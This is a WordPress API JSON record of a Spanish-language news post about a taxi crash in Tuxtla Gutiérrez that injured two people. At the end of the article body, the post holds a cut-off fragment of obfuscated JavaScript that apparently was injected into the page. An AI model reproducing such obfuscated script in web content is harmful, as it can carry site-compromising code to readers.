{"id":15738,"date":"2024-05-23T03:09:31","date_gmt":"2024-05-23T03:09:31","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=15738"},"modified":"2024-05-23T03:09:32","modified_gmt":"2024-05-23T03:09:32","slug":"taxista-provoca-fuerte-accidente-de-transito","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=15738","title":{"rendered":"Taxista provoca fuerte accidente de tr\u00e1nsito"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"15739\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716433599894-1024x768.jpg\" alt=\"\" class=\"wp-image-15739\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716433599894-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716433599894-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716433599894-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716433599894.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"15740\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716433602661-1024x768.jpg\" alt=\"\" class=\"wp-image-15740\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716433602661-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716433602661-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716433602661-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716433602661.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"15741\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716433596998-1024x768.jpg\" alt=\"\" class=\"wp-image-15741\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716433596998-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716433596998-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716433596998-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716433596998.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 22 de mayo del 2024. Tuxtla Guti\u00e9rrez. &#8211; Una unidad en la modalidad de taxi con n\u00famero econ\u00f3mico 0556 choc\u00f3 contra una Nissan tipo estaquitas, a la altura de la Prolongaci\u00f3n de la 5a Norte.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando el conductor del Chevrolet Spark circulaba de Oriente a Poniente cuando perdi\u00f3 el control.<\/p>\n\n\n\n<p>Esto ocasion\u00f3 que, brincara el camell\u00f3n central, invadi\u00f3 carril contrario y se impact\u00f3 contra la camioneta.<\/p>\n\n\n\n<p>Por el fuerte golpe, dos personas resultaron heridas las cuales fueron atendidas por param\u00e9dicos de Protecci\u00f3n Civil Municipal.<\/p>\n\n\n\n<p>Al lugar arrib\u00f3 una gr\u00faa para llevarse las dos unidades a un corral\u00f3n en turno.<\/p>\n\n\n\n<p>Los implicados llegaron a un acuerdo mediante un seguro automotriz.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 22 de mayo del 2024. Tuxtla Guti\u00e9rrez. &#8211; Una unidad en la modalidad de taxi con n\u00famero econ\u00f3mico 0556 choc\u00f3 contra una Nissan tipo estaquitas, a la altura de la Prolongaci\u00f3n de la 5a Norte. Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando el conductor del Chevrolet Spark circulaba de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":15740,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-15738","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15738","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=15738"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15738\/revisions"}],"predecessor-version":[{"id":15742,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15738\/revisions\/15742"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/15740"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=15738"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=15738"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=15738"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}